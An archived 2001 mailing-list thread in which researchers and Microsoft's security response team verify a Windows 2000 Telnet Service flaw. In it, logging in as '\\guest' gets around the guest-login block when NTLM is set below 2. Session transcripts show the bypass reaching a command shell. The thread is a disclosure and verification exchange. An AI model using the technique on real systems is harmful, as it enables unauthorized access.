Re: (MSRC HES) : is this something?

[Philip Stoev <philip () STOEV ORG>]

Looks like one needs to have an _enabled_ guest account and NTLM less than 2
in order to be vulnerable. Setting NTLM to 1 does not change this behavoir.
If the guest account has a password on it, one needs to supply it. I also
tried with the Administrator account -- one can get in using both
\\Administrator and Administrator, however the password must be known.

In brief, this seems to work only on enabled guest accounts with null
passwords and NTLM less than 2. I think that there is something in
Microsoft's telnet daemon that is meant to block guest logins, however it
does not block \\guest ones and they go through fine if one knows the
password.

Philip

Against NTLM = 0 and guest account _enabled_ with no password:

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:[just hit ENTER]
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>

Against NTLM = 0 and guest account _disabled_ with no password:

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:[hit ENTER here]
Logon failure: account currently disabled.

----- Original Message -----
From: "Microsoft Security Response Center" <secure () microsoft com>
To: "Microsoft Security Response Center" <secure () microsoft com>; "'Philip
Stoev'" <philip () stoev org>
Sent: Wednesday, January 17, 2001 11:19 PM
Subject: RE: (MSRC HES) : is this something?


> Against Professional with NTLM at 0
>
> Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
> Welcome to Microsoft Telnet Service
> Telnet Server Build 5.00.99201.1
> login: guest
> Login through Guest account not allowed
> login: \\guest
> password:
> Logon failure: account currently disabled.
>
> Login Failed
>
> login:
>
> ----------------------------------------------------
> Against AD server with NTLM at 0 - Guest acct disabled and acct pwd is
null
> Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
> Welcome to Microsoft Telnet Service
> Telnet Server Build 5.00.99201.1
> login: guest
> Login through Guest account not allowed
> login: \\guest
> password:
> Logon failure: unknown user name or bad password.
>
> Login Failed
>
> login:
>
> -----Original Message-----
> From: Microsoft Security Response Center
> Sent: Wednesday, January 17, 2001 1:13 PM
> To: 'Philip Stoev'
> Cc: Microsoft Security Response Center
> Subject: (MSRC HES) : is this something?
>
>
> Hi Philip -
>
> I'm having troubles verifying this.  What NTLM setting are you using -
> 0,1,or 2?
>
> Are you just supplying a null password for Guest?  I'm assuming that the
> Guest account pwd was not modified...
>
> I'm trying this against an AD Win2K Server.  I'll try it against my WS
right
> now...
>
> --eric
>
> -----Original Message-----
> From: Philip Stoev [mailto:philip () stoev org]
> Sent: Wednesday, January 17, 2001 11:29 AM
> To: sween; VULN-DEV () SECURITYFOCUS COM; Microsoft Security Response
> Center
> Subject: Re: is this something?
>
>
> I was able to confirm that on a vanilla, unpatched Windows 2000
Professional
> without SP1 with NTLM set to 0. It seems to me that only Microsoft's
telnet
> server is affected -- I also tried on a sshd server for Windows 2000 by
> Brandon Zehm <caspian () linuxfreak com>, however it does not appear to be
> affected.
>
> Philip
>
> ----- Original Message -----
> From: "sween" <sween () MODELM ORG>
> To: <VULN-DEV () SECURITYFOCUS COM>
> Sent: Wednesday, January 17, 2001 8:29 AM
> Subject: is this something?
>
>
> > I usually just browse through the messages on this list to play with
> > peoples neat sploits and such...im going to get brave and post something
> > I found playing around this evening...
> > your thoughts on this:
> >
> > WINDOWS 2000Pro, Telnet service started with NTLM turned off...
> >
> >
> > $ telnet 192.168.0.1
> > Trying 192.168.0.1...
> > Connected to 192.168.0.1.
> > Escape character is '^]'.
> > Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
> > Welcome to Microsoft Telnet Service
> > Telnet Server Build 5.00.99201.1
> > login: guest
> > Login through Guest account not allowed
> > login: \\guest
> > password:
> >
> > *===============================================================
> > Welcome to Microsoft Telnet Server.
> > *===============================================================
> > C:\>
> >
> >
> > UNC dealy? misconfig? lack of config? lack of coffee?
> > Thank you for your time.
> >
> > Ron Sweeney
> >
> >
> > -sween
> >  ---
> > | M |  http://www.modelm.org
> >  ---   "clickity, clack."